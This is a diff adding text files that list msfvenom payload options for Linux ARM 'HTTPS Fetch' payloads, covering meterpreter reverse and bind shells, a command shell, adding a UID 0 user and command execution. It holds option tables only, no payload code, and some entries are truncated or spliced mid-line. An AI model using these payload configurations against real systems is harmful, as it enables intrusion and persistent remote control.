+Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TKlJrTGPz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..262d3f9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armbe/meterpreter_reverse_tcp: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sLWCvEYhx no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armbe-shell_bind_tcp.txt new file mode 100644 index 0000000..2c921fc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-shell_bind_tcp.txt @@ -0,0 +1,77 @@ + + Name: HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/armbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command to execute. +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PtSVRKKzekZw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-adduser.txt b/msfvenom/payload_options/cmd-linux-https-armle-adduser.txt new file mode 100644 index 0000000..e1d1f05 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-adduser.txt @@ -0,0 +1,75 @@ + + Name: HTTPS Fetch, Linux Add User + Module: payload/cmd/linux/https/armle/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dCOOzZrXb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-exec.txt b/msfvenom/payload_options/cmd-linux-https-armle-exec.txt new file mode 100644 index 0000000..69ec3fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-exec.txt @@ -0,0 +1,73 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/armle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eldHnRtCl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..7bfa765 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-bind_tcp.txt @@ -0,0 +1,101 @@ + + Name: HTTPS Fetch, Bind TCP Stager + Module: payload/cmd/linux/https/armle/meterpreter/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uXzvchTCBO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..0cb3a4a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-reverse_tcp.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/armle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Nor +Evasion options for payload/cmd/linux/https/armle/meterpreter/reverse_tcp: +========================= + + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uOeaiAXBWBy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_http.txt 